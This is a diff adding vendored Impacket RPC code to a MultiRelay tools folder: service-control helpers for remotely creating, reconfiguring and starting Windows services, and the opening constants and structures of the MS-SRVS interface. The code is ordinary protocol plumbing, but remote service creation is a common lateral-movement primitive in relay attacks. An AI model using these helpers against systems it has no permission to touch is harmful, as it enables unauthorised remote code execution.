+ 5 : (RSetServiceObjectSecurity, RSetServiceObjectSecurityResponse),
+ 6 : (RQueryServiceStatus, RQueryServiceStatusResponse),
+ 7 : (RSetServiceStatus, RSetServiceStatusResponse),
+ 8 : (RUnlockServiceDatabase, RUnlockServiceDatabaseResponse),
+ 9 : (RNotifyBootConfigStatus, RNotifyBootConfigStatusResponse),
+11 : (RChangeServiceConfigW, RChangeServiceConfigWResponse),
+12 : (RCreateServiceW, RCreateServiceWResponse),
+13 : (REnumDependentServicesW, REnumDependentServicesWResponse),
+14 : (REnumServicesStatusW, REnumServicesStatusWResponse),
+15 : (ROpenSCManagerW, ROpenSCManagerWResponse),
+16 : (ROpenServiceW, ROpenServiceWResponse),
+17 : (RQueryServiceConfigW, RQueryServiceConfigWResponse),
+18 : (RQueryServiceLockStatusW, RQueryServiceLockStatusWResponse),
+19 : (RStartServiceW, RStartServiceWResponse),
+20 : (RGetServiceDisplayNameW, RGetServiceDisplayNameWResponse),
+21 : (RGetServiceKeyNameW, RGetServiceKeyNameWResponse),
+35 : (REnumServiceGroupW, REnumServiceGroupWResponse),
+37 : (RChangeServiceConfig2W, RChangeServiceConfig2WResponse),
+39 : (RQueryServiceConfig2W, RQueryServiceConfig2WResponse),
+40 : (RQueryServiceStatusEx, RQueryServiceStatusExResponse),
+42 : (REnumServicesStatusExW, REnumServicesStatusExWResponse),
+45 : (RCreateServiceWOW64W, RCreateServiceWOW64WResponse),
+47 : (RNotifyServiceStatusChange, RNotifyServiceStatusChangeResponse),
+48 : (RGetNotifyResults, RGetNotifyResultsResponse),
+49 : (RCloseNotifyHandle, RCloseNotifyHandleResponse),
+51 : (RControlServiceExW, RControlServiceExWResponse),
+56 : (RQueryServiceConfigEx, RQueryServiceConfigExResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+ if string == NULL:
+ return string
+
+ if string[-1:] != '\x00':
+ return string + '\x00'
+ else:
+ return string
+
+def hRCloseServiceHandle(dce, hSCObject):
+ request = RCloseServiceHandle()
+ request['hSCObject'] = hSCObject
+ return dce.request(request)
+
+def hRControlService(dce, hService, dwControl):
+ request = RControlService()
+ request['hService'] = hService
+ request['dwControl'] = dwControl
+ return dce.request(request)
+
+def hRDeleteService(dce, hService):
+ request = RDeleteService()
+ request ['hService'] = hService
+ return dce.request(request)
+
+def hRLockServiceDatabase(dce, hSCManager):
+ request = RLockServiceDatabase()
+ request['hSCManager'] = hSCManager
+ return dce.request(request)
+
+
+def hRQueryServiceObjectSecurity(dce, hService, dwSecurityInformation, cbBufSize=0):
+ request = RQueryServiceObjectSecurity()
+ request['hService'] = hService
+ request['dwSecurityInformation'] = dwSecurityInformation
+ request['cbBufSize'] = cbBufSize
+ try:
+ resp = dce.request(request)
+ except DCERPCSessionError as e:
+ if e.get_error_code() == system_errors.ERROR_INSUFFICIENT_BUFFER:
+ resp = e.get_packet()
+ request['cbBufSize'] = resp['pcbBytesNeeded']
+ resp = dce.request(request)
+ else:
+ raise
+ return resp
+
+def hRSetServiceObjectSecurity(dce, hService, dwSecurityInformation, lpSecurityDescriptor, cbBufSize ):
+ request = RSetServiceObjectSecurity()
+ request['hService'] = hService
+ request['dwSecurityInformation'] = dwSecurityInformation
+ request['cbBufSize'] = cbBufSize
+ return dce.request(request)
+
+def hRQueryServiceStatus(dce, hService ):
+ request = RQueryServiceStatus()
+ request['hService'] = hService
+ return dce.request(request)
+
+def hRSetServiceStatus(dce, hServiceStatus, lpServiceStatus ):
+ request = RSetServiceStatus()
+ request['hServiceStatus'] = hServiceStatus
+ request['lpServiceStatus'] = lpServiceStatus
+ return dce.request(request)
+
+def hRUnlockServiceDatabase(dce, Lock ):
+ request = RUnlockServiceDatabase()
+ request['Lock'] = Lock
+ return dce.request(request)
+
+def hRNotifyBootConfigStatus(dce, lpMachineName, BootAcceptable ):
+ request = RNotifyBootConfigStatus()
+ request['lpMachineName'] = lpMachineName
+ request['BootAcceptable'] = BootAcceptable
+ return dce.request(request)
+
+def hRChangeServiceConfigW(dce, hService, dwServiceType=SERVICE_NO_CHANGE, dwStartType=SERVICE_NO_CHANGE, dwErrorControl=SERVICE_NO_CHANGE, lpBinaryPathName=NULL, lpLoadOrderGroup=NULL, lpdwTagId=NULL, lpDependencies=NULL, dwDependSize=0, lpServiceStartName=NULL, lpPassword=NULL, dwPwSize=0, lpDisplayName=NULL):
+ changeServiceConfig = RChangeServiceConfigW()
+ changeServiceConfig['hService'] = hService
+ changeServiceConfig['dwServiceType'] = dwServiceType
+ changeServiceConfig['dwStartType'] = dwStartType
+ changeServiceConfig['dwErrorControl'] = dwErrorControl
+ changeServiceConfig['lpBinaryPathName'] = checkNullString(lpBinaryPathName)
+ changeServiceConfig['lpLoadOrderGroup'] = checkNullString(lpLoadOrderGroup)
+ changeServiceConfig['lpdwTagId'] = lpdwTagId
+ changeServiceConfig['lpDependencies'] = lpDependencies
+ # Strings MUST be NULL terminated for lpDependencies
+ changeServiceConfig['dwDependSize'] = dwDependSize
+ changeServiceConfig['lpServiceStartName'] = checkNullString(lpServiceStartName)
+ changeServiceConfig['lpPassword'] = lpPassword
+ changeServiceConfig['dwPwSize'] = dwPwSize
+ changeServiceConfig['lpDisplayName'] = checkNullString(lpDisplayName)
+ return dce.request(changeServiceConfig)
+
+def hRCreateServiceW(dce, hSCManager, lpServiceName, lpDisplayName, dwDesiredAccess=SERVICE_ALL_ACCESS, dwServiceType=SERVICE_WIN32_OWN_PROCESS, dwStartType=SERVICE_AUTO_START, dwErrorControl=SERVICE_ERROR_IGNORE, lpBinaryPathName=NULL, lpLoadOrderGroup=NULL, lpdwTagId=NULL, lpDependencies=NULL, dwDependSize=0, lpServiceStartName=NULL, lpPassword=NULL, dwPwSize=0):
+ createService = RCreateServiceW()
+ createService['hSCManager'] = hSCManager
+ createService['lpServiceName'] = checkNullString(lpServiceName)
+ createService['lpDisplayName'] = checkNullString(lpDisplayName)
+ createService['dwDesiredAccess'] = dwDesiredAccess
+ createService['dwServiceType'] = dwServiceType
+ createService['dwStartType'] = dwStartType
+ createService['dwErrorControl'] = dwErrorControl
+ createService['lpBinaryPathName'] = checkNullString(lpBinaryPathName)
+ createService['lpLoadOrderGroup'] = checkNullString(lpLoadOrderGroup)
+ createService['lpdwTagId'] = lpdwTagId
+ # Strings MUST be NULL terminated for lpDependencies
+ createService['lpDependencies'] = lpDependencies
+ createService['dwDependSize'] = dwDependSize
+ createService['lpServiceStartName'] = checkNullString(lpServiceStartName)
+ createService['lpPassword'] = lpPassword
+ createService['dwPwSize'] = dwPwSize
+ return dce.request(createService)
+
+def hREnumDependentServicesW(dce, hService, dwServiceState, cbBufSize ):
+ enumDependentServices = REnumDependentServicesW()
+ enumDependentServices['hService'] = hService
+ enumDependentServices['dwServiceState'] = dwServiceState
+ enumDependentServices['cbBufSize'] = cbBufSize
+ return dce.request(enumDependentServices)
+
+def hREnumServicesStatusW(dce, hSCManager, dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS, dwServiceState=SERVICE_STATE_ALL):
+ class ENUM_SERVICE_STATUSW2(NDRSTRUCT):
+ # This is a little trick, since the original structure is slightly different
+ # but instead of parsing the LPBYTE buffer at hand, we just do it with the aid
+ # of the NDR library, although the pointers are swapped from the original specification.
+ # Why is this? Well.. since we're getting an LPBYTE back, it's just a copy of the remote's memory
+ # where the pointers are actually POINTING to the data.
+ # Sadly, the pointers are not aligned based on the services records, so we gotta do this
+ # It should be easier in C of course.
+ class STR(NDRPOINTER):
+ referent = (
+ ('Data', WIDESTR),
+ )
+ structure = (
+ ('lpServiceName',STR),
+ ('lpDisplayName',STR),
+ ('ServiceStatus',SERVICE_STATUS),
+ )
+
+ enumServicesStatus = REnumServicesStatusW()
+ enumServicesStatus['hSCManager'] = hSCManager
+ enumServicesStatus['dwServiceType'] = dwServiceType
+ enumServicesStatus['dwServiceState'] = dwServiceState
+ enumServicesStatus['cbBufSize'] = 0
+ enumServicesStatus['lpResumeIndex'] = NULL
+
+ try:
+ resp = dce.request(enumServicesStatus)
+ except DCERPCSessionError as e:
+ if e.get_error_code() == system_errors.ERROR_MORE_DATA:
+ resp = e.get_packet()
+ enumServicesStatus['cbBufSize'] = resp['pcbBytesNeeded']
+ resp = dce.request(enumServicesStatus)
+ else:
+ raise
+
+ # Now we're supposed to have all services returned. Now we gotta parse them
+
+ enumArray = NDRUniConformantArray()
+ enumArray.item = ENUM_SERVICE_STATUSW2
+
+ enumArray.setArraySize(resp['lpServicesReturned'])
+
+ data = b''.join(resp['lpBuffer'])
+ enumArray.fromString(data)
+ data = data[4:]
+ # Since the pointers here are pointing to the actual data, we have to reparse
+ # the referents
+ for record in enumArray['Data']:
+ offset = record.fields['lpDisplayName'].fields['ReferentID']-4
+ name = WIDESTR(data[offset:])
+ record['lpDisplayName'] = name['Data']
+ offset = record.fields['lpServiceName'].fields['ReferentID']-4
+ name = WIDESTR(data[offset:])
+ record['lpServiceName'] = name['Data']
+
+ return enumArray['Data']
+
+def hROpenSCManagerW(dce, lpMachineName='DUMMY\x00', lpDatabaseName='ServicesActive\x00', dwDesiredAccess=SERVICE_START | SERVICE_STOP | SERVICE_CHANGE_CONFIG | SERVICE_QUERY_CONFIG | SERVICE_QUERY_STATUS | SERVICE_ENUMERATE_DEPENDENTS | SC_MANAGER_ENUMERATE_SERVICE):
+ openSCManager = ROpenSCManagerW()
+ openSCManager['lpMachineName'] = checkNullString(lpMachineName)
+ openSCManager['lpDatabaseName'] = checkNullString(lpDatabaseName)
+ openSCManager['dwDesiredAccess'] = dwDesiredAccess
+ return dce.request(openSCManager)
+
+def hROpenServiceW(dce, hSCManager, lpServiceName, dwDesiredAccess= SERVICE_ALL_ACCESS):
+ openService = ROpenServiceW()
+ openService['hSCManager'] = hSCManager
+ openService['lpServiceName'] = checkNullString(lpServiceName)
+ openService['dwDesiredAccess'] = dwDesiredAccess
+ return dce.request(openService)
+
+def hRQueryServiceConfigW(dce, hService):
+ queryService = RQueryServiceConfigW()
+ queryService['hService'] = hService
+ queryService['cbBufSize'] = 0
+ try:
+ resp = dce.request(queryService)
+ except DCERPCSessionError as e:
+ if e.get_error_code() == system_errors.ERROR_INSUFFICIENT_BUFFER:
+ resp = e.get_packet()
+ queryService['cbBufSize'] = resp['pcbBytesNeeded']
+ resp = dce.request(queryService)
+ else:
+ raise
+
+ return resp
+
+def hRQueryServiceLockStatusW(dce, hSCManager, cbBufSize ):
+ queryServiceLock = RQueryServiceLockStatusW()
+ queryServiceLock['hSCManager'] = hSCManager
+ queryServiceLock['cbBufSize'] = cbBufSize
+ return dce.request(queryServiceLock)
+
+def hRStartServiceW(dce, hService, argc=0, argv=NULL ):
+ startService = RStartServiceW()
+ startService['hService'] = hService
+ startService['argc'] = argc
+ if argc == 0:
+ startService['argv'] = NULL
+ else:
+ for item in argv:
+ itemn = LPWSTR()
+ itemn['Data'] = checkNullString(item)
+ startService['argv'].append(itemn)
+ return dce.request(startService)
+
+def hRGetServiceDisplayNameW(dce, hSCManager, lpServiceName, lpcchBuffer ):
+ getServiceDisplay = RGetServiceDisplayNameW()
+ getServiceDisplay['hSCManager'] = hSCManager
+ getServiceDisplay['lpServiceName'] = checkNullString(lpServiceName)
+ getServiceDisplay['lpcchBuffer'] = lpcchBuffer
+ return dce.request(getServiceDisplay)
+
+def hRGetServiceKeyNameW(dce, hSCManager, lpDisplayName, lpcchBuffer ):
+ getServiceKeyName = RGetServiceKeyNameW()
+ getServiceKeyName['hSCManager'] = hSCManager
+ getServiceKeyName['lpDisplayName'] = checkNullString(lpDisplayName)
+ getServiceKeyName['lpcchBuffer'] = lpcchBuffer
+ return dce.request(getServiceKeyName)
+
+def hREnumServiceGroupW(dce, hSCManager, dwServiceType, dwServiceState, cbBufSize, lpResumeIndex = NULL, pszGroupName = NULL ):
+ enumServiceGroup = REnumServiceGroupW()
+ enumServiceGroup['hSCManager'] = hSCManager
+ enumServiceGroup['dwServiceType'] = dwServiceType
+ enumServiceGroup['dwServiceState'] = dwServiceState
+ enumServiceGroup['cbBufSize'] = cbBufSize
+ enumServiceGroup['lpResumeIndex'] = lpResumeIndex
+ enumServiceGroup['pszGroupName'] = pszGroupName
+ return dce.request(enumServiceGroup)
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/srvs.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/srvs.py
new file mode 100644
index 0000000..30f7327
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/srvs.py
@@ -0,0 +1,3296 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-SRVS] Interface implementation
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.ndr import NDRCALL, NDR, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray, \
+ NDRUniFixedArray, NDRBOOLEAN, NDRUniConformantVaryingArray, PNDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import NULL, DWORD, LPWSTR, LPBYTE, LMSTR, ULONG, GUID, LPLONG, WSTR, \
+ SECURITY_INFORMATION, WCHAR
+from impacket import system_errors
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_SRVS = uuidtup_to_bin(('4B324FC8-1670-01D3-1278-5A47BF6EE188', '3.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+ return 'SRVS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'SRVS SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.1.1 SRVSVC_HANDLE
+SRVSVC_HANDLE = WCHAR
+
+class PSRVSVC_HANDLE(NDRPOINTER):
+ referent = (
+ ('Data', SRVSVC_HANDLE),
+ )
+
+# 2.2.1.2 SHARE_DEL_HANDLE
+class SHARE_DEL_HANDLE(NDRSTRUCT):
+ align = 1
+ structure = (
+ ('Data','20s=""'),
+ )
+
+# 2.2.1.3 PSHARE_DEL_HANDLE
+class PSHARE_DEL_HANDLE(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_DEL_HANDLE),
+ )
+
+# 2.2.2.2 MAX_PREFERRED_LENGTH
+MAX_PREFERRED_LENGTH = -1
+
+# 2.2.2.3 Session User Flags
+SESS_GUEST = 0x00000001
+SESS_NOENCRYPTION = 0x00000002
+
+# 2.2.2.4 Share Types
+STYPE_DISKTREE = 0x00000000
+STYPE_PRINTQ = 0x00000001
+STYPE_DEVICE = 0x00000002
+STYPE_IPC = 0x00000003
+STYPE_CLUSTER_FS = 0x02000000
+STYPE_CLUSTER_SOFS = 0x04000000
+STYPE_CLUSTER_DFS = 0x08000000
+
+STYPE_SPECIAL = 0x80000000
+STYPE_TEMPORARY = 0x40000000
+
+# AND with shi_type to extract the Share Type part
+STYPE_MASK = 0x000000FF
+
+# 2.2.2.5 Client-Side Caching (CSC) States
+CSC_CACHE_MANUAL_REINT = 0x00
+CSC_CACHE_AUTO_REINT = 0x10
+CSC_CACHE_VDO = 0x20
+CSC_CACHE_NONE = 0x30
+
+# 2.2.2.6 Platform IDs
+PLATFORM_ID_DOS = 300
+PLATFORM_ID_OS2 = 400
+PLATFORM_ID_NT = 500
+PLATFORM_ID_OSF = 600
+PLATFORM_ID_VMS = 700
+
+# 2.2.2.7 Software Type Flags
+SV_TYPE_WORKSTATION = 0x00000001
+SV_TYPE_SERVER = 0x00000002
+SV_TYPE_SQLSERVER = 0x00000004
+SV_TYPE_DOMAIN_CTRL = 0x00000008
+SV_TYPE_DOMAIN_BAKCTRL = 0x00000010
+SV_TYPE_TIME_SOURCE = 0x00000020
+SV_TYPE_AFP = 0x00000040
+SV_TYPE_NOVELL = 0x00000080
+SV_TYPE_DOMAIN_MEMBER = 0x00000100
+SV_TYPE_LOCAL_LIST_ONLY = 0x40000000
+SV_TYPE_PRINTQ_SERVER = 0x00000200
+SV_TYPE_DIALIN_SERVER = 0x00000400
+SV_TYPE_XENIX_SERVER = 0x00000800
+SV_TYPE_SERVER_MFPN = 0x00004000
+SV_TYPE_NT = 0x00001000
+SV_TYPE_WFW = 0x00002000
+SV_TYPE_SERVER_NT = 0x00008000
+SV_TYPE_POTENTIAL_BROWSER = 0x00010000
+SV_TYPE_BACKUP_BROWSER = 0x00020000
+SV_TYPE_MASTER_BROWSER = 0x00040000
+SV_TYPE_DOMAIN_MASTER = 0x00080000
+SV_TYPE_DOMAIN_ENUM = 0x80000000
+SV_TYPE_WINDOWS = 0x00400000
+SV_TYPE_ALL = 0xFFFFFFFF
+SV_TYPE_TERMINALSERVER = 0x02000000
+SV_TYPE_CLUSTER_NT = 0x10000000
+SV_TYPE_CLUSTER_VS_NT = 0x04000000
+
+# 2.2.2.8 Name Types
+NAMETYPE_USER = 1
+NAMETYPE_PASSWORD = 2
+NAMETYPE_GROUP = 3
+NAMETYPE_COMPUTER = 4
+NAMETYPE_EVENT = 5
+NAMETYPE_DOMAIN = 6
+NAMETYPE_SERVICE = 7
+NAMETYPE_NET = 8
+NAMETYPE_SHARE = 9
+NAMETYPE_MESSAGE = 10
+NAMETYPE_MESSAGEDEST = 11
+NAMETYPE_SHAREPASSWORD = 12
+NAMETYPE_WORKGROUP = 13
+
+# 2.2.2.9 Path Types
+ITYPE_UNC_COMPNAME = 4144
+ITYPE_UNC_WC = 4145
+ITYPE_UNC = 4096
+ITYPE_UNC_WC_PATH = 4097
+ITYPE_UNC_SYS_SEM = 6400
+ITYPE_UNC_SYS_SHMEM = 6656
+ITYPE_UNC_SYS_MSLOT = 6144
+ITYPE_UNC_SYS_PIPE = 6912
+ITYPE_UNC_SYS_QUEUE = 7680
+ITYPE_PATH_ABSND = 8194
+ITYPE_PATH_ABSD = 8198
+ITYPE_PATH_RELND = 8192
+ITYPE_PATH_RELD = 8196
+ITYPE_PATH_ABSND_WC = 8195
+ITYPE_PATH_ABSD_WC = 8199
+ITYPE_PATH_RELND_WC = 8193
+ITYPE_PATH_RELD_WC = 8197
+ITYPE_PATH_SYS_SEM = 10498
+ITYPE_PATH_SYS_SHMEM = 10754
+ITYPE_PATH_SYS_MSLOT = 10242
+ITYPE_PATH_SYS_PIPE = 11010
+ITYPE_PATH_SYS_COMM = 11266
+ITYPE_PATH_SYS_PRINT = 11522
+ITYPE_PATH_SYS_QUEUE = 11778
+ITYPE_PATH_SYS_SEM_M = 43266
+ITYPE_PATH_SYS_SHMEM_M = 43522
+ITYPE_PATH_SYS_MSLOT_M = 43010
+ITYPE_PATH_SYS_PIPE_M = 43778
+ITYPE_PATH_SYS_COMM_M = 44034
+ITYPE_PATH_SYS_PRINT_M = 44290
+ITYPE_PATH_SYS_QUEUE_M = 44546
+ITYPE_DEVICE_DISK = 16384
+ITYPE_DEVICE_LPT = 16400
+ITYPE_DEVICE_COM = 16416
+ITYPE_DEVICE_CON = 16448
+ITYPE_DEVICE_NUL = 16464
+
+# 2.2.2.11 SHARE_INFO Parameter Error Codes
+
+SHARE_NETNAME_PARMNUM = 1
+SHARE_TYPE_PARMNUM = 3
+SHARE_REMARK_PARMNUM = 4
+SHARE_PERMISSIONS_PARMNUM = 5
+SHARE_MAX_USES_PARMNUM = 6
+SHARE_CURRENT_USES_PARMNUM = 7
+SHARE_PATH_PARMNUM = 8
+SHARE_PASSWD_PARMNUM = 9
+SHARE_FILE_SD_PARMNUM = 501
+
+# 2.2.2.12 SERVER_INFO Parameter Error Codes
+SV_PLATFORM_ID_PARMNUM = 101
+SV_NAME_PARMNUM = 102
+SV_VERSION_MAJOR_PARMNUM = 103
+SV_VERSION_MINOR_PARMNUM = 104
+SV_TYPE_PARMNUM = 105
+SV_COMMENT_PARMNUM = 5
+SV_USERS_PARMNUM = 107
+SV_DISC_PARMNUM = 10
+SV_HIDDEN_PARMNUM = 16
+SV_ANNOUNCE_PARMNUM = 17
+SV_ANNDELTA_PARMNUM = 18
+SV_USERPATH_PARMNUM = 112
+SV_SESSOPENS_PARMNUM = 501
+SV_SESSVCS_PARMNUM = 502
+SV_OPENSEARCH_PARMNUM = 503
+SV_SIZREQBUF_PARMNUM = 504
+SV_INITWORKITEMS_PARMNUM = 505
+SV_MAXWORKITEMS_PARMNUM = 506
+SV_RAWWORKITEMS_PARMNUM = 507
+SV_IRPSTACKSIZE_PARMNUM = 508
+SV_MAXRAWBUFLEN_PARMNUM = 509
+SV_SESSUSERS_PARMNUM = 510
+SV_SESSCONNS_PARMNUM = 511
+SV_MAXNONPAGEDMEMORYUSAGE_PARMNUM = 512
+SV_MAXPAGEDMEMORYUSAGE_PARMNUM = 513
+SV_ENABLESOFTCOMPAT_PARMNUM = 514
+SV_ENABLEFORCEDLOGOFF_PARMNUM = 515
+SV_TIMESOURCE_PARMNUM = 516
+SV_ACCEPTDOWNLEVELAPIS_PARMNUM = 517
+SV_LMANNOUNCE_PARMNUM = 518
+SV_DOMAIN_PARMNUM = 519
+SV_MAXCOPYREADLEN_PARMNUM = 520
+SV_MAXCOPYWRITELEN_PARMNUM = 521
+SV_MINKEEPSEARCH_PARMNUM = 522
+SV_MAXKEEPSEARCH_PARMNUM = 523
+SV_MINKEEPCOMPLSEARCH_PARMNUM = 524
+SV_MAXKEEPCOMPLSEARCH_PARMNUM = 525
+SV_THREADCOUNTADD_PARMNUM = 526
+SV_NUMBLOCKTHREADS_PARMNUM = 527
+SV_SCAVTIMEOUT_PARMNUM = 528
+SV_MINRCVQUEUE_PARMNUM = 529
+SV_MINFREEWORKITEMS_PARMNUM = 530
+SV_XACTMEMSIZE_PARMNUM = 531
+SV_THREADPRIORITY_PARMNUM = 532
+SV_MAXMPXCT_PARMNUM = 533
+SV_OPLOCKBREAKWAIT_PARMNUM = 534
+SV_OPLOCKBREAKRESPONSEWAIT_PARMNUM = 535
+SV_ENABLEOPLOCKS_PARMNUM = 536
+SV_ENABLEOPLOCKFORCECLOSE_PARMNUM = 537
+SV_ENABLEFCBOPENS_PARMNUM = 538
+SV_ENABLERAW_PARMNUM = 539
+SV_ENABLESHAREDNETDRIVES_PARMNUM = 540
+SV_MINFREECONNECTIONS_PARMNUM = 541
+SV_MAXFREECONNECTIONS_PARMNUM = 542
+SV_INITSESSTABLE_PARMNUM = 543
+SV_INITCONNTABLE_PARMNUM = 544
+SV_INITFILETABLE_PARMNUM = 545
+SV_INITSEARCHTABLE_PARMNUM = 546
+SV_ALERTSCHEDULE_PARMNUM = 547
+SV_ERRORTHRESHOLD_PARMNUM = 548
+SV_NETWORKERRORTHRESHOLD_PARMNUM = 549
+SV_DISKSPACETHRESHOLD_PARMNUM = 550
+SV_MAXLINKDELAY_PARMNUM = 552
+SV_MINLINKTHROUGHPUT_PARMNUM = 553
+SV_LINKINFOVALIDTIME_PARMNUM = 554
+SV_SCAVQOSINFOUPDATETIME_PARMNUM = 555
+SV_MAXWORKITEMIDLETIME_PARMNUM = 556
+
+# 2.2.2.13 DFS Entry Flags
+PKT_ENTRY_TYPE_CAIRO = 0x0001
+PKT_ENTRY_TYPE_MACHINE = 0x0002
+PKT_ENTRY_TYPE_NONCAIRO = 0x0004
+PKT_ENTRY_TYPE_LEAFONLY = 0x0008
+PKT_ENTRY_TYPE_OUTSIDE_MY_DOM = 0x0010
+PKT_ENTRY_TYPE_INSITE_ONLY = 0x0020
+PKT_ENTRY_TYPE_REFERRAL_SVC = 0x0080
+PKT_ENTRY_TYPE_PERMANENT = 0x0100
+PKT_ENTRY_TYPE_LOCAL = 0x0400
+PKT_ENTRY_TYPE_LOCAL_XPOINT = 0x0800
+PKT_ENTRY_TYPE_MACH_SHARE = 0x1000
+PKT_ENTRY_TYPE_OFFLINE = 0x2000
+
+# 2.2.4.7 FILE_INFO_3
+# fi3_permissions
+PERM_FILE_READ = 0x00000001
+PERM_FILE_WRITE = 0x00000002
+PERM_FILE_CREATE = 0x00000004
+ACCESS_EXEC = 0x00000008
+ACCESS_DELETE = 0x00000010
+ACCESS_ATRIB = 0x00000020
+ACCESS_PERM = 0x00000040
+
+# 2.2.4.29 SHARE_INFO_1005
+# shi1005_flags
+SHI1005_FLAGS_DFS = 0x00000001
+SHI1005_FLAGS_DFS_ROOT = 0x00000002
+CSC_MASK = 0x00000030
+SHI1005_FLAGS_RESTRICT_EXCLUSIVE_OPENS = 0x00000100
+SHI1005_FLAGS_FORCE_SHARED_DELETE = 0x00000200
+SHI1005_FLAGS_ALLOW_NAMESPACE_CACHING = 0x00000400
+SHI1005_FLAGS_ACCESS_BASED_DIRECTORY_ENUM = 0x00000800
+SHI1005_FLAGS_FORCE_LEVELII_OPLOCK = 0x00001000
+SHI1005_FLAGS_ENABLE_HASH = 0x00002000
+SHI1005_FLAGS_ENABLE_CA = 0x00004000
+SHI1005_FLAGS_ENCRYPT_DATA = 0x00008000
+
+# 2.2.4.43 SERVER_INFO_103
+# sv103_capabilities
+SRV_SUPPORT_HASH_GENERATION = 0x0001
+SRV_HASH_GENERATION_ACTIVE = 0x0002
+
+# 2.2.4.96 SERVER_TRANSPORT_INFO_3
+# svti3_flags
+SVTI2_REMAP_PIPE_NAMES = 0x00000002
+SVTI2_SCOPED_NAME = 0x00000004
+
+# 2.2.4.109 DFS_SITENAME_INFO
+# SiteFlags
+DFS_SITE_PRIMARY = 0x00000001
+
+# 3.1.4.42 NetrDfsFixLocalVolume (Opnum 51)
+# ServiceType
+DFS_SERVICE_TYPE_MASTER = 0x00000001
+DFS_SERVICE_TYPE_READONLY = 0x00000002
+DFS_SERVICE_TYPE_LOCAL = 0x00000004
+DFS_SERVICE_TYPE_REFERRAL = 0x00000008
+DFS_SERVICE_TYPE_ACTIVE = 0x000000010
+DFS_SERVICE_TYPE_DOWN_LEVEL = 0x000000020
+DFS_SERVICE_TYPE_COSTLIER = 0x000000040
+DFS_SERVICE_TYPE_OFFLINE = 0x000000080
+
+# CreateDisposition
+FILE_SUPERSEDE = 0x00000000
+FILE_OPEN = 0x00000001
+FILE_CREATE = 0x00000002
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.4.1 CONNECTION_INFO_0
+class CONNECTION_INFO_0(NDRSTRUCT):
+ structure = (
+ ('coni0_id', DWORD),
+ )
+
+class CONNECTION_INFO_0_ARRAY(NDRUniConformantArray):
+ item = CONNECTION_INFO_0
+
+class LPCONNECTION_INFO_0_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', CONNECTION_INFO_0_ARRAY),
+ )
+
+# 2.2.4.2 CONNECTION_INFO_1
+class CONNECTION_INFO_1(NDRSTRUCT):
+ structure = (
+ ('coni1_id', DWORD),
+ ('coni1_type', DWORD),
+ ('coni1_num_opens', DWORD),
+ ('coni1_num_users', DWORD),
+ ('coni1_time', DWORD),
+ ('coni1_username', LPWSTR),
+ ('coni1_netname', LPWSTR),
+ )
+
+class CONNECTION_INFO_1_ARRAY(NDRUniConformantArray):
+ item = CONNECTION_INFO_1
+
+class LPCONNECTION_INFO_1_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', CONNECTION_INFO_1_ARRAY),
+ )
+
+# 2.2.4.3 CONNECT_INFO_0_CONTAINER
+class CONNECT_INFO_0_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPCONNECTION_INFO_0_ARRAY),
+ )
+
+class LPCONNECT_INFO_0_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', CONNECT_INFO_0_CONTAINER),
+ )
+
+# 2.2.4.4 CONNECT_INFO_1_CONTAINER
+class CONNECT_INFO_1_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPCONNECTION_INFO_1_ARRAY),
+ )
+
+class LPCONNECT_INFO_1_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', CONNECT_INFO_1_CONTAINER),
+ )
+
+# 2.2.3.1 CONNECT_ENUM_UNION
+class CONNECT_ENUM_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', DWORD),
+ )
+
+ union = {
+ 0: ('Level0', LPCONNECT_INFO_0_CONTAINER),
+ 1: ('Level1', LPCONNECT_INFO_1_CONTAINER),
+ }
+
+# 2.2.4.5 CONNECT_ENUM_STRUCT
+class CONNECT_ENUM_STRUCT(NDRSTRUCT):
+ structure = (
+ ('Level', DWORD),
+ ('ConnectInfo', CONNECT_ENUM_UNION),
+ )
+
+# 2.2.4.6 FILE_INFO_2
+class FILE_INFO_2(NDRSTRUCT):
+ structure = (
+ ('fi2_id', DWORD),
+ )
+
+class LPFILE_INFO_2(NDRPOINTER):
+ referent = (
+ ('Data', FILE_INFO_2),
+ )
+
+class FILE_INFO_2_ARRAY(NDRUniConformantArray):
+ item = FILE_INFO_2
+
